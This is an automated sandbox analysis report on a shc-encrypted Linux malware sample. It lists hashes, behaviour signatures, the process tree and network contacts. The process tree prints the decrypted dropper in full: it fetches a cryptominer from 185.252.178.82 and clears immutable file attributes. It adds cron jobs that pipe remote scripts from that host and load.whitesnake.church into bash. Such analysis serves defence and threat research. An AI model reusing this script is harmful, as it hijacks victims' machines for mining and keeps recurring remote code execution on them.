Overview

overview

10

Static

static

10

样本/Lin...9DC1D8

ubuntu-18.04-amd64

7

样本/Lin...B36C5B

ubuntu-24.04-amd64

6

样本/Lin...E3B383

ubuntu-24.04-amd64

8

样本/Lin...6F5973

ubuntu-22.04-amd64

1

样本/Lin...776DB8

ubuntu-18.04-amd64

1

样本/Lin...776DB8

debian-9-armhf

1

样本/Lin...776DB8

debian-9-mips

1

样本/Lin...776DB8

debian-9-mipsel

1

样本/Lin...C9A3F7

ubuntu-18.04-amd64

6

样本/Lin...C9A3F7

debian-9-armhf

6

样本/Lin...C9A3F7

debian-9-mips

6

样本/Lin...C9A3F7

debian-9-mipsel

6

样本/Lin...FECBE5

ubuntu-22.04-amd64

10

1AAF1A9F78...31.tar

windows7-x64

1

1AAF1A9F78...31.tar

windows10-2004-x64

1

xrx/chattr

ubuntu-24.04-amd64

1

xrx/init.sh

ubuntu-22.04-amd64

6

xrx/init0

ubuntu-24.04-amd64

8

xrx/scp

ubuntu-18.04-amd64

1

xrx/scp

debian-9-armhf

1

xrx/scp

debian-9-mips

1

xrx/scp

debian-9-mipsel

1

xrx/secure

ubuntu-24.04-amd64

7

xrx/uninstall.sh

ubuntu-18.04-amd64

6

xrx/uninstall.sh

debian-9-armhf

6

xrx/uninstall.sh

debian-9-mips

6

xrx/uninstall.sh

debian-9-mipsel

6

xrx/xrx

ubuntu-18.04-amd64

6

Analysis

  • max time kernel
    10s
  • max time network
    130s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    26/11/2024, 12:41 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

  • Size

    1023KB

  • MD5

    069ad3938c3f9c049f670a8eb49dc1d8

  • SHA1

    f4fd0c87a18d45ab4b642f32a94673c949ab7caf

  • SHA256

    84d4b99f0d98900b4eadb7e107bf54196f2e5796d8707ebf0dcd76f5b6693295

  • SHA512

    3c627883f53082face65b22d353c1926c4d4f4de008cf41cf2a3326762ad080dd95324f2fd35c3f60c069df4fb2c510d4fa07b26cbc404678f8a655c884beedb

  • SSDEEP

    12288:SBgtRmLBGYhFcueTIqRe/w/Yt6myOP7/x7L15k7bKrHNq9EnE:SQRmLBTFcueTIie/wgB/x7LFLNq9

Score
7/10
defense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Attempts to change immutable files 4 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 2 IoCs
    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery

Processes

  • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
    1⤵
      PID:1510
    • /bin/bash
      /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c "exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' \"\$@\"" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
      1⤵
        PID:1510
      • /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
        1⤵
          PID:1510
        • /bin/bash
          /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c " #!/bin/bash ifrunning=\$(pgrep xrx) ######################## ######################## downloadminer(){ link1=\"http://185.252.178.82:6972/xrx/xrx\" link2=\"http://185.252.178.82:6972/configs/config-xrx.json\" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O \$link1 || cd1 -L -O \$link1 || wget \$link1 --no-check-certificate curl -L -O \$link2 || cd1 -L -O \$link2 || wget \$link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( \$EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo \"@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> .spark sleep 1 echo \"*/30 * * * * curl 185.252.178.82:1011/next | bash \" >> .spark sleep 1 echo \"*/30 * * * * curl load.whitesnake.church:1011/next | bash \" >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( \$EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo \"@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown \$* \" >> /etc/crontab echo \"*/30 * * * * root curl 185.252.178.82:1011/next | bash \" >> /etc/crontab echo \"*/30 * * * * root curl load.whitesnake.church:1011/next | bash \" >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print \$5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo \"miner intact\" else echo \"miner not found,downloading...\" downloadminer fi if [[ \"\$fsiz\" -gt 0 ]]; then echo \"miner size intact\" else echo \"filesize 0,downloading...\" downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z \"\$ifrunning\" ; then echo \"xrx not running,starting...\" /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e \"pid:\" pgrep xrx fi " /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8
          1⤵
          • File and Directory Permissions Modification
          • Creates/modifies Cron job
          PID:1510
          • /usr/bin/pgrep
            pgrep xrx
            2⤵
            • Reads CPU attributes
            • Reads runtime system information
            PID:1512
          • /usr/bin/awk
            awk "{print \$5}"
            2⤵
              PID:1515
            • /bin/ls
              ls -l /var/tmp/.xrx/xrx
              2⤵
              • Reads runtime system information
              PID:1514
            • /bin/mkdir
              mkdir /var/tmp/.xrx
              2⤵
                PID:1516
              • /usr/bin/chattr
                chattr -ia /var/tmp/.xrx/xrx
                2⤵
                • Attempts to change immutable files
                PID:1517
              • /usr/bin/chattr
                chattr -ia /var/tmp/.xrx/config.json
                2⤵
                • Attempts to change immutable files
                PID:1518
              • /bin/rm
                rm -rf /var/tmp/.xrx/xrx
                2⤵
                  PID:1519
                • /bin/rm
                  rm -rf /var/tmp/.xrx/config.json
                  2⤵
                    PID:1520
                  • /usr/bin/curl
                    curl -L -O http://185.252.178.82:6972/xrx/xrx
                    2⤵
                      PID:1521
                    • /usr/bin/wget
                      wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                      2⤵
                        PID:1523
                      • /usr/bin/curl
                        curl -L -O http://185.252.178.82:6972/configs/config-xrx.json
                        2⤵
                          PID:1527
                        • /usr/bin/wget
                          wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate
                          2⤵
                            PID:1529
                          • /bin/mv
                            mv config-xrx.json config.json
                            2⤵
                              PID:1530
                            • /bin/chmod
                              chmod +x /var/tmp/.xrx/xrx
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1531
                            • /bin/mkdir
                              mkdir /var/tmp/.xrx
                              2⤵
                                PID:1532
                              • /usr/bin/chattr
                                chattr -ia /var/tmp/.xrx/xrx
                                2⤵
                                • Attempts to change immutable files
                                PID:1533
                              • /usr/bin/chattr
                                chattr -ia /var/tmp/.xrx/config.json
                                2⤵
                                • Attempts to change immutable files
                                PID:1534
                              • /bin/rm
                                rm -rf /var/tmp/.xrx/xrx
                                2⤵
                                  PID:1535
                                • /bin/rm
                                  rm -rf /var/tmp/.xrx/config.json
                                  2⤵
                                    PID:1536
                                  • /usr/bin/curl
                                    curl -L -O http://185.252.178.82:6972/xrx/xrx
                                    2⤵
                                      PID:1537
                                    • /usr/bin/wget
                                      wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate
                                      2⤵
                                        PID:1539
                                      • /usr/bin/curl
                                        curl -L -O http://185.252.178.82:6972/configs/config-xrx.json
                                        2⤵
                                          PID:1540
                                        • /usr/bin/wget
                                          wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate
                                          2⤵
                                            PID:1542
                                          • /bin/mv
                                            mv config-xrx.json config.json
                                            2⤵
                                              PID:1543
                                            • /bin/chmod
                                              chmod +x /var/tmp/.xrx/xrx
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:1544
                                            • /bin/grep
                                              grep -q secure
                                              2⤵
                                                PID:1546
                                              • /bin/cat
                                                cat /etc/crontab
                                                2⤵
                                                  PID:1545
                                                • /bin/sleep
                                                  sleep 1
                                                  2⤵
                                                    PID:1548
                                                  • /var/tmp/.xrx/xrx
                                                    /var/tmp/.xrx/xrx
                                                    2⤵
                                                      PID:1547
                                                    • /usr/bin/pgrep
                                                      pgrep xrx
                                                      2⤵
                                                      • Reads CPU attributes
                                                      • Reads runtime system information
                                                      PID:1549

                                                  Network

                                                    No results found
                                                  • 185.252.178.82:6972
                                                    60 B
                                                     1
                                                  • 185.252.178.82:6972
                                                    60 B
                                                     1
                                                  • 185.125.188.61:443
                                                    tls
                                                    135 B
                                                     2
                                                  • 185.125.188.61:443
                                                    tls
                                                    135 B
                                                     2
                                                  • 151.101.193.91:443
                                                    tls, https
                                                    233 B
                                                     40 B
                                                     1
                                                    1
                                                  • 151.101.193.91:443
                                                    extensions.gnome.org
                                                    tls
                                                    1.1kB
                                                     5.4kB
                                                     11
                                                    14
                                                  • 185.252.178.82:6972
                                                    60 B
                                                     1
                                                  • 185.252.178.82:6972
                                                    60 B
                                                     1
                                                  • 195.181.164.14:443
                                                    tls, https
                                                    35.0kB
                                                     134
                                                  • 185.252.178.82:6972
                                                    60 B
                                                     1
                                                  • 185.252.178.82:6972
                                                    60 B
                                                     1
                                                  • 185.252.178.82:6972
                                                    120 B
                                                     2
                                                  • 185.252.178.82:6972
                                                    240 B
                                                     4
                                                  • 224.0.0.251:5353
                                                    146 B
                                                     2

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  We care about your privacy.

                                                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.